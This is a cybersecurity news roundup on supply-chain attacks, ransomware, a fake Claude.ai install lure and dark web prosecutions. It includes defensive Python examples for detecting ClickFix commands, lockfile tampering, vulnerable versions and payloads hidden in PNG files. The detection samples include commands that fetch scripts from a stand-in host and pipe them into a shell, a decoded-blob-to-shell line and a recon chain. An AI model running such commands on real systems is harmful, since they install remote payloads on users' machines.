Cybersecurity News Roundup: Cybercrime Shifts Toward Faster Supply Chain Attacks, Silent Extortion, and Real-World Consequences
The week’s incidents show cybercrime becoming faster and quieter, with supply chain attacks targeting developer ecosystems because compromising one package can spread malware to thousands of organizations. Ransomware groups are shifting tactics because encryption does not guarantee payments.
Google researchers said they identified what may be the first suspected AI-assisted zero-day exploit before it reached large-scale exploitation.
Fake Claude.ai Chats in Google Ads Campaign Infect Macs
Attackers are abusing Google Ads and Claude.ai shared chats to distribute malware to macOS users searching for Claude installation tools. Sponsored search results reportedly display claude.ai as the destination, which makes the malicious setup pages appear legitimate. The campaign uses fake installation guides that instruct users to open the macOS Terminal and paste and run copied shell commands. Those scripts collect system information, including IP address, hostname, operating system version, and keyboard settings, before deploying additional payloads.
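The lure above works because the victim types the command into Terminal themselves, so the telltale in endpoint telemetry is a shell spawned by Terminal that pipes a downloaded or decoded script into another shell, often followed by host fingerprinting. The following is an added example, not code from the article or from the campaign analysis it summarizes, that scores process-execution log lines for those patterns. The parent/proc/cmd line format, the sample events, and the recon command list are constructed assumptions for illustration; adapt the parser to your EDR's export format.

```python
"""Score process-execution telemetry for ClickFix-style Terminal commands.

Added example, not code from the article or from the campaign analysis it
summarizes. The `parent=... proc=... cmd=...` line format, the sample
events, and the recon command list are constructed for illustration.
"""
import re

# Constructed telemetry lines (assumed format; adapt to your EDR export).
SAMPLE_EVENTS = [
    "parent=Terminal proc=bash cmd=curl -fsSL https://example.invalid/install.sh | bash",
    "parent=Terminal proc=zsh cmd=echo aGVsbG8gd29ybGQgdGhpcyBpcyBhIGxvbmcgYmxvYg== | base64 -d | sh",
    "parent=Terminal proc=bash cmd=hostname; sw_vers; uname -a; curl -s ifconfig.me",
    "parent=Terminal proc=bash cmd=ls -la ~/Downloads",
    "parent=launchd proc=bash cmd=curl -fsSL https://example.invalid/update.sh | bash",
]

EVENT_RE = re.compile(r"parent=(\S+)\s+proc=(\S+)\s+cmd=(.*)$")
# A pipe into sh/bash/zsh, optionally via sudo or a full path such as /bin/bash.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:\S*/)?(?:ba|z)?sh\b")
FETCH = re.compile(r"\b(?:curl|wget)\b")
DECODE = re.compile(r"\b(?:base64\s+(?:-d|-D|--decode)|xxd\s+-r|openssl\s+enc\s+-d)\b")
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Commands whose combination looks like macOS host fingerprinting (assumed list).
RECON = {"hostname", "sw_vers", "uname", "whoami", "ifconfig", "ioreg",
         "system_profiler", "scutil", "defaults"}
# Interactive terminals: a match here means the user typed or pasted the command.
USER_TERMINALS = {"Terminal", "iTerm2"}


def parse_event(line):
    """Split one constructed telemetry line into parent, process and command."""
    m = EVENT_RE.match(line.strip())
    return None if m is None else {"parent": m[1], "proc": m[2], "cmd": m[3]}


def indicators(cmd):
    """Return the list of suspicious patterns found in a command line."""
    hits = []
    piped = PIPE_TO_SHELL.search(cmd) is not None
    if piped and FETCH.search(cmd):
        hits.append("remote script piped to shell")
    if piped and DECODE.search(cmd):
        hits.append("decoded payload piped to shell")
    words = set(re.findall(r"[A-Za-z_][A-Za-z0-9_]*", cmd))
    recon = sorted(RECON & words)
    if len(recon) >= 2:                      # one recon command is normal; a chain is not
        hits.append("recon chain: " + ",".join(recon))
    if LONG_B64.search(cmd):
        hits.append("long base64 blob")
    return hits


def flag_events(lines):
    """Return flagged events; `clickfix_like` marks commands run from a user terminal."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        hits = indicators(ev["cmd"])
        if hits:
            flagged.append({"cmd": ev["cmd"], "parent": ev["parent"], "hits": hits,
                            "clickfix_like": ev["parent"] in USER_TERMINALS})
    return flagged


if __name__ == "__main__":
    for f in flag_events(SAMPLE_EVENTS):
        tag = "CLICKFIX?" if f["clickfix_like"] else "review"
        print(f"[{tag}] {f['parent']}: {f['cmd']}\n    {'; '.join(f['hits'])}")
```

The parent-process check is what separates a user-pasted lure from a scripted install: the same `curl | bash` under launchd is still worth a look, but it is the Terminal ancestry that matches the social-engineering flow described in the report.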
Unoaerre Rejects €3.8M Ransom After Cyberattack Forces Factory Evacuation
Italian jewelry manufacturer Unoaerre refused to pay a €3.8 million bitcoin ransom after a ransomware attack disrupted operations at its manufacturing facility on May 10, 2026. The incident reportedly unfolded while the company was preparing for the OroArezzo trade fair and its 100th-anniversary exhibition. Employees were instructed to leave the plant after software systems became unresponsive and internal teams detected abnormal network activity. IT specialists isolated affected infrastructure to contain the intrusion.
West Pharmaceutical Hit By Cyberattack, Worldwide Operations Disrupted
West Pharmaceutical Services disclosed a material cyberattack after detecting an intrusion on May 4. The company said attackers exfiltrated data and encrypted systems, prompting global shutdowns and operational disruptions. West notified law enforcement and hired Palo Alto Networks’ Unit 42 to assist with investigation and recovery efforts. The company said manufacturing and shipping processes have restarted at some sites, while full restoration remains ongoing. West added that it is still investigating the scope of the incident, including the extent of affected data and potential financial impact.
Google Detects First Suspected AI-Developed Zero-Day Exploit
Google Threat Intelligence Group said it identified what may be the first known zero-day exploit developed with AI assistance. The exploit was written in Python and targeted a widely used open-source, web-based administration tool. Google said the flaw could have allowed attackers to bypass two-factor authentication through a logic issue tied to a hardcoded trust assumption. The planned campaign was disrupted before it could become a mass exploitation event. The report also covered broader AI use by threat actors, including malware automation, vulnerability research, and fake media operations. Google said it does not believe Gemini was used to develop this exploit.
Hackers Exploit Critical cPanel Flaw to Steal Credentials and Hijack Servers
Researchers at QiAnXin XLab said threat actors linked to the Mr_Rot13 group are actively exploiting CVE-2026-41940, a critical cPanel and WHM vulnerability with a CVSS score of 9.8. The flaw allows authentication bypass and full administrative control. XLab said more than 2,000 attacking IP addresses have already been observed globally since the public disclosure of the vulnerability in late April. The attackers reportedly deploy a Go-based loader. The malware steals bash histories, SSH records, database passwords, and device information before transmitting the data to attacker-controlled infrastructure and Telegram channels.
Ransomware Groups Now Prioritize Extortion Over Encryption as Payments Decline
Ransomware groups are shifting away from traditional file encryption attacks and focusing instead on data theft and extortion-based operations, according to new threat intelligence research. Researchers said declining ransom payment rates are pushing cybercriminals to rely more heavily on stolen credentials, public leak threats, and access brokerage services rather than disruptive encryption campaigns. The report also highlighted growing use of EDR killers, Bring Your Own Vulnerable Driver (BYOVD) techniques, and post-quantum cryptography in modern ransomware operations.
Congress Investigates Canvas Breach After Instructure Reaches Deal With ShinyHunters
Instructure confirmed it paid a ransom to the ShinyHunters cybercrime group after attackers stole data linked to the Canvas learning platform used by schools and universities across the U.S. The agreement included the return of stolen files and digital confirmation that the data had been deleted, though such claims from cybercriminals cannot be independently verified. The breach reportedly exposed names, email addresses, student IDs, and messages exchanged between students and professors. Canvas was temporarily taken offline. The House Homeland Security Committee has now requested a formal security briefing from Instructure.
Authorities Arrest Alleged Dream Market Mastermind Over Crypto-to-Gold Laundering
A German national accused of secretly running the now-defunct darknet marketplace Dream Market has been indicted in the U.S. on multiple money laundering charges. Prosecutors allege Owe Martin Andresen, 49, moved more than $2 million in cryptocurrency tied to illegal marketplace commissions between 2023 and 2025, later converting part of the proceeds into physical gold bars shipped to addresses in Germany. Investigators said the wallet activity could only have been performed by someone holding Dream Market’s original private keys, linking Andresen to the long-unidentified administrator known as “Speedstepper.” Authorities seized gold bars, cash, and cryptocurrency holdings.
Mistral AI Says No Internal Breach Found After TeamPCP Leak Claims
Threat actor TeamPCP has claimed responsibility for a supposed breach of French AI company Mistral AI, alleging it stole around 5 GB of internal data spanning roughly 450 repositories. The group claims the data includes AI model training systems, fine-tuning projects, benchmarking assets, inference infrastructure, experiments, and future development work, and is attempting to sell the cache for $25,000. Mistral AI has not confirmed any compromise of its internal systems and instead disclosed that it was impacted by the wider TanStack supply chain attack involving malicious NPM and PyPI packages.
OpenAI Says User Data Safe After TanStack Supply-Chain Attack
OpenAI stated that a recent supply-chain compromise involving malicious TanStack npm packages did not result in the exposure of user data, production systems, or company intellectual property. The company confirmed that two employee devices inside its corporate environment were affected after attackers distributed poisoned versions of the widely used open-source library earlier this week. Investigators found that limited credential material tied to specific code repositories was exfiltrated, but OpenAI said there is no evidence that broader systems, models, or software deployments were compromised.
Mass Supply Chain Attack Compromised Hundreds of npm and PyPI Packages
Researchers uncovered a large software supply chain attack affecting widely used npm and PyPI packages linked to TanStack, Mistral AI, UiPath, and OpenSearch. Investigators said attackers published hundreds of malicious package versions designed to steal developer credentials and compromise CI/CD environments. The campaign reportedly used poisoned updates and automated propagation methods to spread malware across developer ecosystems within hours. The malware targeted GitHub tokens, cloud credentials, and publishing infrastructure, potentially enabling further package hijacking attacks. Researchers described the incident as one of the largest coordinated package ecosystem compromises seen this year.
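Poisoned package versions reach CI because the runner trusts whatever the registry serves; the lockfile's `integrity` field is the one control that pins content rather than just a version number. The following is an added example, not code from the article or from any of the projects it names, showing how that check works: it recomputes the Subresource Integrity hash npm records in package-lock.json and compares it with what was fetched. The package names, lockfile excerpt and tarball bytes are constructed for illustration.

```python
"""Check npm lockfile integrity (SRI) values against tarball bytes.

Added example, not code from the article or from any project it names. The
lockfile excerpt, package names, and tarball bytes are constructed; the
hash format (sha512 digest, base64, "sha512-" prefix) is the SRI form npm
records in package-lock.json.
"""
import base64
import hashlib
import hmac


def sri(data: bytes, algo: str = "sha512") -> str:
    """Subresource Integrity string for `data`, e.g. 'sha512-<base64 digest>'."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, data).digest()).decode()}"


def verify_integrity(expected: str, data: bytes) -> bool:
    """True if `data` hashes to `expected`; unknown or weak algorithms fail closed."""
    algo, sep, _ = expected.partition("-")
    if sep != "-" or algo not in ("sha256", "sha384", "sha512"):
        return False
    return hmac.compare_digest(sri(data, algo), expected)


def audit_lockfile(lock: dict, fetched: dict) -> dict:
    """Verdict per dependency path in a lockfileVersion 2/3 `packages` map."""
    verdicts = {}
    for path, meta in lock.get("packages", {}).items():
        if path == "":                        # the root project entry has no tarball
            continue
        integrity = meta.get("integrity")
        if not integrity:
            verdicts[path] = "NO_INTEGRITY"   # version pinned, content is not
        elif path not in fetched:
            verdicts[path] = "NOT_FETCHED"
        elif verify_integrity(integrity, fetched[path]):
            verdicts[path] = "OK"
        else:
            verdicts[path] = "MISMATCH"       # tarball differs from what was locked
    return verdicts


# Constructed tarball contents (stand-ins for real .tgz bytes).
ROUTER_TGZ = b"constructed tarball: @example/router 1.4.2\n"
QUERY_TGZ = b"constructed tarball: @example/query 5.0.1\n"
QUERY_TGZ_POISONED = QUERY_TGZ + b"postinstall: curl https://example.invalid/x | sh\n"

# Constructed package-lock.json excerpt; integrity values computed from the
# clean tarballs above, as npm would have recorded them at lock time.
LOCKFILE = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/@example/router": {"version": "1.4.2", "integrity": sri(ROUTER_TGZ)},
        "node_modules/@example/query": {"version": "5.0.1", "integrity": sri(QUERY_TGZ)},
        "node_modules/unpinned-helper": {"version": "0.9.0"},
    },
}

# What a CI runner actually downloaded: the query package was swapped out.
FETCHED = {
    "node_modules/@example/router": ROUTER_TGZ,
    "node_modules/@example/query": QUERY_TGZ_POISONED,
}

if __name__ == "__main__":
    for path, verdict in audit_lockfile(LOCKFILE, FETCHED).items():
        print(f"{verdict:13} {path}")
```

`npm ci` performs this comparison itself and aborts on a mismatch, so the check catches a tarball substituted under an already-locked version. It does not catch a malicious release published under a new version number, which carries a valid integrity of its own; that case needs the lockfile to not be bumped automatically, and `npm ci --ignore-scripts` to keep lifecycle scripts, a common execution point for stealers in npm packages, from running on the build host.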
Kingdom Market Administrator Sentenced Over Dark Web Drug Marketplace
A Slovak man received a prison sentence for helping operate the Kingdom Market dark web platform. Alan Bill admitted to supporting the marketplace between 2021 and 2023 through administrative and promotional work. Investigators said the platform sold illegal drugs, fake documents, stolen financial data, and malware. German authorities seized the platform's servers during a multinational operation after Bill's arrest in New Jersey in December 2023. Prosecutors said evidence linked him to thousands of drug sales, including fentanyl-laced substances, and the court identified him as a major operator within the marketplace.
PraisonAI Vulnerability Faced Exploitation Attempts Within Hours of Disclosure
Security researchers observed attackers probing a newly disclosed PraisonAI vulnerability within four hours of public disclosure. The flaw, tracked as CVE-2026-44338, affected legacy API server configurations with authentication disabled by default. Researchers said exposed systems allowed unauthenticated users to access agent workflows and trigger automated actions remotely. The issue impacted PraisonAI versions 2.5.6 through 4.6.33 before developers released fixes in version 4.6.34. Investigators warned the rapid scanning activity reflects a growing trend where threat actors weaponize disclosed vulnerabilities immediately.
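With scanning starting within hours, the first practical question is which environments carry a version inside the affected range. The following is an added example, not code from the article or from the PraisonAI project, that checks `pip freeze` output against an inclusive version range. The range (2.5.6 through 4.6.33, fixed in 4.6.34) is taken from the article; the distribution name `praisonai` and the sample freeze output are assumptions for illustration, so confirm the name against your own package index before relying on it.

```python
"""Find installed versions inside an affected range in `pip freeze` output.

Added example, not code from the article or from the PraisonAI project.
The affected range (2.5.6 through 4.6.33, fixed in 4.6.34) is from the
article; the distribution name "praisonai" and the freeze output below are
assumptions for illustration.
"""
import re

# Assumed PyPI distribution name -> inclusive (first affected, last affected).
AFFECTED = {"praisonai": ("2.5.6", "4.6.33")}


def parse_version(text: str) -> tuple:
    """Numeric release segments only; pre-release and local suffixes are ignored."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    nums = tuple(int(p) for p in m[1].split("."))
    return nums + (0,) * (3 - len(nums))      # pad so "4.6" compares like 4.6.0


def in_range(version: str, low: str, high: str) -> bool:
    """Inclusive range test on the parsed release tuples."""
    return parse_version(low) <= parse_version(version) <= parse_version(high)


def scan_freeze(freeze_text: str) -> list:
    """Return (name, version, affected) for each pinned line in `pip freeze` output."""
    results = []
    for line in freeze_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "==" not in line:
            continue   # skip comments, editable installs, VCS/URL requirements
        name, _, version = line.partition("==")
        name = re.sub(r"[-_.]+", "-", name).lower()   # PEP 503 name normalisation
        rng = AFFECTED.get(name)
        affected = rng is not None and in_range(version, *rng)
        results.append((name, version, affected))
    return results


def affected_packages(freeze_text: str) -> list:
    """Only the (name, version) pairs that fall inside an affected range."""
    return [(n, v) for n, v, a in scan_freeze(freeze_text) if a]


# Constructed `pip freeze` output from three hypothetical environments.
SAMPLE_FREEZE = """\
# env A
praisonai==4.6.33
requests==2.32.3
# env B
PraisonAI==4.6.34
# env C
praisonai==2.5.5
"""

if __name__ == "__main__":
    for name, version in affected_packages(SAMPLE_FREEZE):
        print(f"AFFECTED {name}=={version}")
```

The version check is only half the picture: the article says the exposure came from legacy API server configurations with authentication disabled by default, so an environment on an affected version that never exposes that server is in a different position from one that does, and upgrading to 4.6.34 or later is the fix in either case.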
Attackers Used Steganography To Deliver PureLogs Malware Through PAWSRunner
Fortinet researchers uncovered a malware campaign using steganography to hide PureLogs payloads inside image files. The operation used a delivery tool called PAWSRunner to retrieve and execute hidden malware components in memory. Researchers said the campaign relied on multi-stage execution techniques designed to avoid antivirus detection and forensic analysis. PureLogs is an information-stealing malware family targeting browser data, credentials, cryptocurrency wallets, and application information. The findings highlight how threat actors increasingly combine fileless execution and concealed payload delivery to bypass traditional security defenses.
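The report does not say which concealment method PAWSRunner uses, so the following is an added example of one common form of image-borne payload delivery rather than the campaign's own technique: data appended after a PNG's IEND chunk, which image viewers ignore but a loader can read back. The code is not from the article or from Fortinet; it builds a minimal valid PNG, appends a constructed payload, and shows how a scanner can walk the chunk structure to find trailing bytes and chunks whose CRC no longer matches.

```python
"""Find data hidden after a PNG image's IEND chunk, and chunks with bad CRCs.

Added example, not code from the article or from Fortinet. The PNG and the
appended payload are constructed here; this illustrates one common
image-based concealment technique, not necessarily the one PAWSRunner uses.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def iter_chunks(data: bytes):
    """Yield chunk metadata in file order, stopping at IEND like a decoder would."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    off = 8
    while off + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        if off + 12 + length > len(data):
            break                                   # truncated chunk
        body = data[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", data[off + 8 + length:off + 12 + length])
        yield {"type": ctype.decode("ascii"), "offset": off, "length": length,
               "crc_ok": crc == (zlib.crc32(ctype + body) & 0xFFFFFFFF)}
        off += 12 + length
        if ctype == b"IEND":
            break


def image_end(data: bytes) -> int:
    """Offset just past the IEND chunk, i.e. where a viewer stops reading."""
    for c in iter_chunks(data):
        if c["type"] == "IEND":
            return c["offset"] + 12 + c["length"]
    raise ValueError("no IEND chunk")


def trailing_bytes(data: bytes) -> bytes:
    """Anything stored after the image proper; a viewer never touches it."""
    return data[image_end(data):]


def scan(data: bytes) -> dict:
    """Summary a triage script can act on: chunk list, CRC failures, trailing data."""
    chunks = list(iter_chunks(data))
    return {"chunks": [c["type"] for c in chunks],
            "bad_crc": [c["type"] for c in chunks if not c["crc_ok"]],
            "trailing": trailing_bytes(data)}


# Constructed 1x1 8-bit greyscale PNG: header, one compressed scanline, end marker.
IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
CLEAN_PNG = (PNG_SIG + make_chunk(b"IHDR", IHDR)
             + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
             + make_chunk(b"IEND", b""))
# Constructed stand-in for a hidden second stage; not a real malware sample.
PAYLOAD = b"constructed stage-2 blob, not a real sample\n"
STEGO_PNG = CLEAN_PNG + PAYLOAD

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PNG), ("stego", STEGO_PNG)):
        r = scan(img)
        print(f"{label}: chunks={r['chunks']} bad_crc={r['bad_crc']} "
              f"trailing={len(r['trailing'])} bytes")
```

A file that opens normally but carries trailing bytes, or whose IDAT CRC fails, is worth pulling for analysis. This check says nothing about least-significant-bit embedding, where the payload lives inside valid pixel data; that needs statistical or reference-image comparison instead.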
Cybercrime’s Expanding Playbook
AI systems are now both targets and operational tools in cybercrime. Threat actors exploited newly disclosed AI-related flaws, while researchers warned that AI-assisted exploit development is emerging.
Cyberattacks spilled into public institutions with the Canvas breach exposing educational data, triggering negotiations with cybercriminals, and drawing congressional attention.
International coordination between governments, researchers, and law enforcement agencies continued to drive investigations and defensive operations across borders.